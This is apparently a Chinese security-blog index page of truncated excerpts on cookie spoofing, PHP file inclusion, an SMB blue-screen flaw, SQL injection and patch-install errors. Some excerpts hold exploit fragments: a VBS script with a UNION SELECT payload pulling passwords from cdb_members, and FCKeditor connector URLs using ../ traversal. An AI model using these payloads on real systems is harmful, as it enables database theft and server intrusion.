最后罗嗦一句，本人录入这篇文章用的机器上没有ASP环境，所以提供的代码未能进行测试，对这一点本人深表歉意。如果大家发现了代码中的任何问题，欢迎拍砖～本人皮厚～一、攻击原理Cookies欺骗主要利用当前网络上一些用户管理系统将用户登录信息储存在Cookies中这一不安全的做法进行攻击，其攻击方法相对于SQL注入漏洞等漏洞来说相对要“困难”一些，但还是很“傻瓜”。我们知道，一般的基于Cookies的用户系统至少会在Cookies中储存两个变量：username和userlevel，其中username为用户名，而userlevel为用户的等级。当我们的浏览器访问ASP页面时，它会传出类似GET/....

几乎所有的cgi程序都有这样的bug，只是具体的表现方式不一样罢了。一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说，如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是这样，脚本会继续运行。如果"allow_url_fopen"在PHP中被激活（默认配置），也可以用URL（通过HTTP或者...

9月初，在各大安全网站上登载了一个Windows操作系统的蓝屏漏洞的消息，这个漏洞的出现如同一颗石子，打破了近半年来Windows没有爆出重大漏洞的沉寂。　　蓝屏漏洞威胁的是服务器操作系统WindowsServer2008，这意味着如果WindowsServer2008蓝屏，将导致服务器停止服务……目前，漏洞的利用代码还限制在小范围内，不过漏洞攻击工具却已经研制出来了，现在为大家揭秘蓝屏漏洞的利用过程。　　问题：WindowsServer2008蓝屏漏洞　　危害：服务器出现蓝屏停止服务　　危机：服务器的蓝屏隐痛　　我是安天实验室的苗得雨，我下面给大家说的就是蓝屏漏洞。蓝屏漏洞的正式名称是SMB...

也利于修改以下是search.inc.php文件漏洞利用代码VBS版[code]DimstrUrl,strSite,strPath,strUidshowB()SetArgs=Wscript.ArgumentsIfArgs.Count<>3ThenShowU()ElsestrSite=Args(0)strPath=Args(1)strUid=Args(2)EndIfstrUrl="action=search&searchid=22%cf'UNIONSELECT1,password,3,password/**/from/**/cdb_members/**/where/**/ui...

【前面的话】在网上经常看到有人对request.getSession(false)提出疑问，我第一次也很迷惑，看了一下J2EE1.3API，看一下官网是怎么解释的。【官方解释】getSessionpublicHttpSessiongetSession(booleancreate)ReturnsthecurrentHttpSessionassociatedwiththisrequestor,ififthereisnocurrentsessionandcreateistrue,returnsanewsession.IfcreateisfalseandtherequesthasnovalidHttp...

SQL注入是什么?　　许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问)，根据程序返回的结果，获得某些想得知的数据，这就是所谓的SQLInjection，即SQL注入。　　网站的恶梦――SQL注入　　SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。　　防御SQL注入有妙法　　第一步:很多新手从...

1CurrentFolder参数，可以在网站中不同目录新建文件夹，参数使用../../来篡改参数，进入不同的目录/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp2CurrentFolder参数，根据返回的XML信息可以查看网站所有的目录，比如“../../../”进入不同的目录，让后通过XML返回的消息就可以看到没有权限的页面browser/default/conn...

by：lcx示例：<title>LoadPicture函数</title><formname="frm">选择图片<inputtype="file"name="pic"onChange="GetPicInfor()"></form><scriptlanguage="vbscript">SubGetPicInfor()dimobjpic,iWidth,iHeightdimpictype,picpathpicpath=document.frm.pic.valuesetobjpic=Loadpicture(picpath)iWi...

1.在驱动器c:上没有足够的空间来安装kb950749。安装程序至少需要28mb的附加可用空间。或者您还想为卸载存档文件，安装程序需要46mb的附加可用空间。请释放更多的空间再试。解决方法：a.用户清理磁盘空间，保证足够的空间，即可以安装成功2.kb******安装程序遇到了一个错误:安装程序不能验证update.inf文件的完整性。请确定加密服务正在此计算机上运行。安装程序不能验证update.inf文件的完整性。请确定加密服务正在此计算机上运行解决方法：a.重新开启“加密服务”，然后尝试再次安装此程序。要将“加密服务”设置为“自动”，请按照下列步骤操作：b.启动“控制面板”中的“管理工具”...

...

http://forum.eviloctal.com/thread-32151-1-1.html 之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧.. 伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞) 主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保.. mibao.asp文件对提交的参数没有任何过滤 [code]if action="put" then  sql="select *&n...